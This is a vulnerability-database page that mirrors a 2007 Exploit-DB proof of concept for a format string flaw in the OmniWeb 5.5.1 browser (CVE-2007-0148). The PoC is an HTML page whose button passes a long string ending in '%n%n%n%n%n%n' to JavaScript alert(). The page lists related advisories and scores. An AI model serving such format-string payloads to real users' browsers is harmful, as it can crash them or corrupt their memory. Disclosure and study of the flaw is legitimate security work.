Lucene search
+L

OmniWeb 5.5.1 - JavaScript alert() Remote Format String (PoC)

🗓️ 07 Jan 2007 00:00:00Reported by MoABType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 42 Views

OmniWeb 5.5.1 JavaScript alert() Remote Format String vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
nessus
Tenable Nessus
OmniWeb Browser < 5.5.2 Javascript alert Function Format String
8 Jan 200700:00
nessus
cve
CVE
CVE-2007-0148
9 Jan 200718:00
cve
cvelist
Cvelist
CVE-2007-0148
9 Jan 200718:00
cvelist
nvd
NVD
CVE-2007-0148
9 Jan 200718:28
nvd
prion
Prion
Format string
9 Jan 200718:28
prion
securityvulns
securityvulns
Apple OmniWeb Format string vulnerability
8 Jan 200700:00
securityvulns
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
	"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
	<head>
		<title>MOAB-07-01-2007</title>
		<script>
			/* LMH */
			function boom() {
				var str = 'A';
				while (str.length <= 32) str+=str;
				str = str + '%n%n%n%n%n%n';
				alert(str);
			}
		</script>
	</head>
	<body>
		<input type="button" onclick="boom();" value="Test MOAB-07-01-2007" />
	</body>

</html>

# milw0rm.com [2007-01-07]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Jan 2007 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.8
EPSS0.06272
42